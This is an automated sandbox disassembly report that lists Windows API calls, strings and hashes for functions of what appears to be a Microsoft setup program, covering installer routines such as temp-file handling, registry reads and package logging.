                                                                                                                                                                    • Instruction ID: 69c04c86c05ee2b34a7e804f925ee62df5a2323901a9a0d12f93b20aaaf1d6bf
                                                                                                                                                                    • Opcode Fuzzy Hash: 52bd6a224eb6b1a648a86305a1401c74534d9d9a9db99be3a0fd5d0dda47fba9
                                                                                                                                                                    • Instruction Fuzzy Hash: C311C436848255EBDB125B78E90564A3B98AF823E4B20D435F8599B980DF39C848C7F1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 69D95254
• _memset.LIBCMT ref: 69D9526E
• Process32FirstW.KERNEL32(00000000,?), ref: 69D95288
• Process32NextW.KERNEL32(00000000,0000022C), ref: 69D952A3
• FindCloseChangeNotification.KERNEL32(00000000), ref: 69D952B7
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32_memset
• String ID:
• API String ID: 949835396-0
• Opcode ID: cc22abaa42eb4f4e75595eaf9b5ea6103538405633e72d5855daa1a99ed683e1
• Instruction ID: 39e2709d54b2fd9c4f0a93f64a8fa4930ea023d8c087d821fc562f5a259933f8
• Opcode Fuzzy Hash: cc22abaa42eb4f4e75595eaf9b5ea6103538405633e72d5855daa1a99ed683e1
• Instruction Fuzzy Hash: 6F018C31911128EBDB10EBA5998DEAE77B8FB87311F4042B5E914D3280DB34EE45CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNEL32(?,00000000,?,698E0FC5,2F25BB2A), ref: 698F7BFB
• DeleteFileW.KERNEL32(?,00000000,?,698E0FC5,2F25BB2A), ref: 698F7C0E
• DeleteFileW.KERNEL32(00000000,00000000,?,698E0FC5,2F25BB2A), ref: 698F7C1E
• GetLastError.KERNEL32(?,698E0FC5,2F25BB2A), ref: 698F7C28
• MoveFileW.KERNEL32(?,00000000), ref: 698F7C41
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: File$Delete$ChangeCloseErrorFindLastMoveNotification
• String ID:
• API String ID: 441735897-0
• Opcode ID: 6cb6f78a66907ff9550a31aa34205c483b4af02c1460f58bd633a7cea0685b86
• Instruction ID: 97ef6dcc2aad8a2799d1787cca019a6fa7ea77d4fcd15b814c139a32467fa317
• Opcode Fuzzy Hash: 6cb6f78a66907ff9550a31aa34205c483b4af02c1460f58bd633a7cea0685b86
• Instruction Fuzzy Hash: D1F05B316041549BEB116F64CD09B4A36A9EF233D6F006C39F949D1100D7708592CAE5
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D82E4F
  • Part of subcall function 69DA9653: _free.LIBCMT ref: 69DA9698
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3_free
• String ID: evaluated to false$ evaluated to true$BlockIf
• API String ID: 2248394366-2909538125
• Opcode ID: 6b420af697f3bcc0941b7a1fff9c44bb56f016af378e7b83effaac03a5dcf685
• Instruction ID: 86d3c047af2ad9147c13c432e76b6014e1caf3e09c30f96e5494d33661ff630c
• Opcode Fuzzy Hash: 6b420af697f3bcc0941b7a1fff9c44bb56f016af378e7b83effaac03a5dcf685
• Instruction Fuzzy Hash: 01A17375900209DFCF10DFA8CA84ADEBBB5FF08318F1081A9E519AB751D731E916CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• __CxxThrowException@8.LIBCMT ref: 69DA45A2
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69D78329: __EH_prolog3.LIBCMT ref: 69D78330
  • Part of subcall function 69D78129: SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,69D7AA3A,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 69D78149
Strings
• Cannot create file or delete file in Temp directory , xrefs: 69DA45C5
• .htm, xrefs: 69DA4763
• Cannot get valid temp folder, xrefs: 69DA456D
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$Exception@8FilePointerThrow
• String ID: .htm$Cannot create file or delete file in Temp directory $Cannot get valid temp folder
• API String ID: 1975055723-2150540039
• Opcode ID: c9ef4824f6a4f39c2768c44edb502b19a942e59ef9e05bfe69d202e8501e9f14
• Instruction ID: 74241c61c1fed91f6cbd389b9309910c83abefd8d45f04923f935a99dabf32ae
• Opcode Fuzzy Hash: c9ef4824f6a4f39c2768c44edb502b19a942e59ef9e05bfe69d202e8501e9f14
• Instruction Fuzzy Hash: F7A148750083849FD700DFA8C845B4EBBE9BF85328F008A2DF4A4D7A90DB74D9088B63
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D92E83
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69D92DBC: __EH_prolog3.LIBCMT ref: 69D92DC3
  • Part of subcall function 69DA91D4: __EH_prolog3.LIBCMT ref: 69DA91DB
  • Part of subcall function 69DA91D4: __recalloc.LIBCMT ref: 69DA921D
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$__recalloc
• String ID: No ProcessBlock element$ProcessBlock added$ProcessBlocks
• API String ID: 1900422986-3251087430
• Opcode ID: f30c14b28645ef7705ea8f89e0bf61821d5e7317187ae846c36e670595383f1c
• Instruction ID: 95e64bb52d6c7318426ce5a131a8c95940cc1a188190ee1036f4b9cd52321b78
• Opcode Fuzzy Hash: f30c14b28645ef7705ea8f89e0bf61821d5e7317187ae846c36e670595383f1c
• Instruction Fuzzy Hash: B5715DB0A00249DFDF00DFA8C984AAEBBB5BF49308F548079E519EB791C7359E45CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D931CB
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69D93104: __EH_prolog3.LIBCMT ref: 69D9310B
  • Part of subcall function 69DA91D4: __EH_prolog3.LIBCMT ref: 69DA91DB
  • Part of subcall function 69DA91D4: __recalloc.LIBCMT ref: 69DA921D
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$__recalloc
• String ID: No ServiceBlock element$ServiceBlock added$ServiceBlocks
• API String ID: 1900422986-3373415214
• Opcode ID: e0810c00a140672322a4b3d3f3ee6724936ef518dc6ac5ced4663d5a554df742
• Instruction ID: a40e505c3a01ac054f04a4496bd09dbdb9dc5c473410308c0026d9280a761ce9
• Opcode Fuzzy Hash: e0810c00a140672322a4b3d3f3ee6724936ef518dc6ac5ced4663d5a554df742
• Instruction Fuzzy Hash: F3712FB0A0024ADFDF00DFE8C984AAEBBB5BF49308F548069E515EB791C7359E44CB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_catch.LIBCMT ref: 69DA72EB
  • Part of subcall function 69D743C4: __EH_prolog3.LIBCMT ref: 69D743CB
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69DA8ED0: __EH_prolog3.LIBCMT ref: 69DA8ED7
  • Part of subcall function 69DA8ED0: PathFindExtensionW.SHLWAPI(?,00000004,69DA7362,?,?,?,00000000,?,?), ref: 69DA8F01
  • Part of subcall function 69DCC0AA: _malloc.LIBCMT ref: 69DCC0C4
  • Part of subcall function 69DA3B2B: __EH_prolog3.LIBCMT ref: 69DA3B32
  • Part of subcall function 69DA3B2B: InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,69DAEC79,?,?), ref: 69DA3BC9
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$CriticalExtensionFindH_prolog3_catchInitializePathSection_malloc
• String ID: .htm$.html$.txt
• API String ID: 2678321574-1806469533
• Opcode ID: 493bc62813ef44c24256cd662e1f67c4e2f05e0a78c78c843c61fb881aab9450
• Instruction ID: cc1c75ba86173acd6d45cea645658f62e61f3f461eabf2d371464354acde988a
• Opcode Fuzzy Hash: 493bc62813ef44c24256cd662e1f67c4e2f05e0a78c78c843c61fb881aab9450
• Instruction Fuzzy Hash: 4951B235D00249EEDF00CBB8C904B9E7BF9AF15318F109575E854EBA95DB748A14CB72
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
  • Part of subcall function 698F7ACF: GetTempPathW.KERNEL32(00000100,?,?,00000000), ref: 698F7AFC
  • Part of subcall function 698E0ECA: SendMessageW.USER32(00000000,0000044A,00000002,?), ref: 698E0F06
• PathFileExistsW.SHLWAPI(?,?,2F25BB2A), ref: 698E1126
• ShellExecuteW.SHELL32(00000001,print,?,00000000,00000000,00000000), ref: 698E116E
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: Path$ExecuteExistsFileH_prolog3MessageSendShellTemp
• String ID: %s\BlockersInfo%d.rtf$print
• API String ID: 2742019059-575943144
• Opcode ID: 21b1bb1bb5078e69f0940799ffeb928ba8e30a7a455ffb40f16c07f8c30791b7
• Instruction ID: eee194f3293839ea7288463da59cf78cc7f8032342d93f09fa8d7997e66dfde3
• Opcode Fuzzy Hash: 21b1bb1bb5078e69f0940799ffeb928ba8e30a7a455ffb40f16c07f8c30791b7
• Instruction Fuzzy Hash: AB416C725082459FCB10DF69C844A5FBBE8FF89758F445E2DF098E3251D730DA1A8B62
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: ErrorH_prolog3Last
• String ID: DW\DW20.exe$Failed to record SetupFlags
• API String ID: 685212868-3543485478
• Opcode ID: d9dee96a6706b01c16b92799651bedffccbec46332a8b2fcec2edbc91e917378
• Instruction ID: 6aa062ef987526d7088ca16422dc241a5eb1041c6c6424380fd9ae56871a4aeb
• Opcode Fuzzy Hash: d9dee96a6706b01c16b92799651bedffccbec46332a8b2fcec2edbc91e917378
• Instruction Fuzzy Hash: 45417B79900149DFCB00DBB8C945AEEBBB9AF05328F148664E411EB791CB34DA058BB1
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 69A73E94
• RegQueryValueExW.KERNEL32(00000000,00000002,00000000,?,?,00000004), ref: 69A73EB0
• RegCloseKey.KERNEL32(00000000), ref: 69A73ECE
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
• Associated: 00000004.00000002.4207888905.0000000069A70000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.4208013345.0000000069A90000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.4208074023.0000000069A91000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: CEIPEnable
• API String ID: 3677997916-1389088331
• Opcode ID: f44f486f375cf5075b446ad5893c577b79054209feba2831c73bd0cebee80e7f
• Instruction ID: a962e6408bac8f99d10ceae9b08f6a1fb440e216f4c957ca41ea5d244adcce3a
• Opcode Fuzzy Hash: f44f486f375cf5075b446ad5893c577b79054209feba2831c73bd0cebee80e7f
• Instruction Fuzzy Hash: F031B33A554398EFDB21CF44C986F9A7BE9BB41B84F054059FD119E0A4C3728AC1AB90
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB3440
                                                                                                                                                                    • PathStripToRootW.SHLWAPI(00000000,C600000B,69DAFA6E,00000010,?,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DB34D8
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DB350D
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to record SystemMemory, xrefs: 69DB3527
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorH_prolog3LastPathRootStrip
                                                                                                                                                                    • String ID: Failed to record SystemMemory
                                                                                                                                                                    • API String ID: 1831876552-335854511
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA7CA5
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7391D: __EH_prolog3.LIBCMT ref: 69D73924
                                                                                                                                                                      • Part of subcall function 69D7395E: __EH_prolog3.LIBCMT ref: 69D73965
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: Package Name = %s$Package Version = %s$Package details
                                                                                                                                                                    • API String ID: 431132790-2412997842
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D77132
                                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,00000010), ref: 69D77191
                                                                                                                                                                    • #195.MSI(00000010,00000000,00000104,00000000,00000000,00000104,00000010,MSI.dll), ref: 69D77200
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: #195FolderH_prolog3Path
                                                                                                                                                                    • String ID: MSI.dll
                                                                                                                                                                    • API String ID: 2462876523-3845536143
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 69DA76A7: __EH_prolog3.LIBCMT ref: 69DA76AE
                                                                                                                                                                      • Part of subcall function 69DA76A7: GetModuleHandleW.KERNEL32(kernel32.dll,00000020,69DAF845,?), ref: 69DA7748
                                                                                                                                                                      • Part of subcall function 69DA76A7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 69DA7758
                                                                                                                                                                      • Part of subcall function 69DA76A7: SetThreadStackGuarantee.KERNEL32(00020000), ref: 69DA776D
                                                                                                                                                                      • Part of subcall function 69DA76A7: SetUnhandledExceptionFilter.KERNEL32(69DB416A), ref: 69DA7774
                                                                                                                                                                      • Part of subcall function 69DA76A7: GetCommandLineW.KERNEL32 ref: 69DA777A
                                                                                                                                                                    • _memset.LIBCMT ref: 69DAF85B
                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(DebugIronMan,?,000000FF,?,?,?), ref: 69DAF874
                                                                                                                                                                    • DebugBreak.KERNEL32(?,?,?), ref: 69DAF8B8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressBreakCommandDebugEnvironmentExceptionFilterGuaranteeH_prolog3HandleLineModuleProcStackThreadUnhandledVariable_memset
                                                                                                                                                                    • String ID: DebugIronMan
                                                                                                                                                                    • API String ID: 12115070-628588297
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 69A73D28
                                                                                                                                                                      • Part of subcall function 69A7182C: RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,69A72E5E,?,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 69A71897
                                                                                                                                                                      • Part of subcall function 69A7182C: RegQueryValueExW.KERNEL32(69A72E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 69A718B3
                                                                                                                                                                      • Part of subcall function 69A7182C: RegCloseKey.KERNEL32(69A72E5E,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 69A718D1
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,80000001,Software\Microsoft\SQMClient,UserId,?,00000027), ref: 69A73D74
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseErrorLastOpenQueryValuememset
                                                                                                                                                                    • String ID: Software\Microsoft\SQMClient$UserId
                                                                                                                                                                    • API String ID: 895213837-3032788761
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 69A72E34
                                                                                                                                                                      • Part of subcall function 69A7182C: RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,69A72E5E,?,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 69A71897
                                                                                                                                                                      • Part of subcall function 69A7182C: RegQueryValueExW.KERNEL32(69A72E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 69A718B3
                                                                                                                                                                      • Part of subcall function 69A7182C: RegCloseKey.KERNEL32(69A72E5E,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 69A718D1
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 69A72E80
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseErrorLastOpenQueryValuememset
                                                                                                                                                                    • String ID: MachineId$Software\Microsoft\SQMClient
                                                                                                                                                                    • API String ID: 895213837-1718750536
Uniqueness

Uniqueness Score: -1.00%

APIs
• _malloc.LIBCMT ref: 698FD771
  • Part of subcall function 698F8FCB: __FF_MSGBANNER.LIBCMT ref: 698F8FE4
  • Part of subcall function 698F8FCB: __NMSG_WRITE.LIBCMT ref: 698F8FEB
  • Part of subcall function 698F8FCB: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,?,?,698F91D6,?), ref: 698F9010
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: AllocateHeap_malloc
• String ID:
• API String ID: 501242067-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,69A7332F,?), ref: 69A73683
• OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,69A7332F,?), ref: 69A736B3
  • Part of subcall function 69A72815: GetTokenInformation.KERNELBASE(?,69A7332F(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,69A736C7,?,00000001), ref: 69A72835
  • Part of subcall function 69A72815: GetLastError.KERNEL32(?,?,69A736C7,?,00000001,?,?,?,?,69A7332F,?), ref: 69A7283B
  • Part of subcall function 69A72815: GetTokenInformation.KERNELBASE(?,69A7332F(TokenIntegrityLevel),00000000,00000000,00000000,?,?,69A736C7,?,00000001,?,?,?,?,69A7332F,?), ref: 69A72863
• ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 69A736D5
• FindCloseChangeNotification.KERNEL32(?,?,00000001,?,?,?,?,69A7332F,?), ref: 69A736E0
Memory Dump Source
• Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
• Associated: 00000004.00000002.4207888905.0000000069A70000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.4208013345.0000000069A90000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.4208074023.0000000069A91000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
Similarity
• API ID: Token$InformationProcess$ChangeCloseConvertCurrentErrorFindLastNotificationOpenString
• String ID:
• API String ID: 3562588798-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• _malloc.LIBCMT ref: 698F91D1
  • Part of subcall function 698F8FCB: __FF_MSGBANNER.LIBCMT ref: 698F8FE4
  • Part of subcall function 698F8FCB: __NMSG_WRITE.LIBCMT ref: 698F8FEB
  • Part of subcall function 698F8FCB: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,?,?,698F91D6,?), ref: 698F9010
